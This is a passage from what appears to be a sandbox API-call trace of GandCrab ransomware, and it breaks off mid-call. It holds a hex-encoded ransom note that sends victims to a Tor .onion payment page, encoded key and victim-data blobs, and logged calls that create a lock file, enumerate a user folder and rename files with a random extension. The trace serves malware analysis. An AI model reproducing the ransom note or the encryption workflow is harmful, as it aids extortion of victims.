x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.343] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0070.344] CloseHandle (hObject=0x2c4) returned 1 [0070.344] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.344] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.344] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x28c)) [0070.344] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.344] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.344] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.345] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a09d2ca4deb61a.lock") returned 101 [0070.345] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0070.346] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.346] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.346] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 77 [0070.346] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*" [0070.346] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5037b8 [0070.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.346] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.347] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.347] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.347] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.347] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.347] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.347] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a09d2ca4deb61a.lock" [0070.347] lstrlenW (lpString=".titwmvjl") returned 9 [0070.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a09d2ca4deb61a.lock") returned 101 [0070.347] VirtualAlloc (lpAddress=0x0, dwSize=0x10a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.347] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 110 [0070.348] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a09d2ca4deb61a.lock") returned 101 [0070.348] lstrlenW (lpString=".lock") returned 5 [0070.348] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.348] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.348] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.348] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.348] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.348] lstrcmpW (lpString1="DQQHJZ8C", lpString2=".") returned 1 [0070.348] lstrcmpW (lpString1="DQQHJZ8C", lpString2="..") returned 1 [0070.348] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="DQQHJZ8C" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C" [0070.348] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C", lpString2="\\" | out: 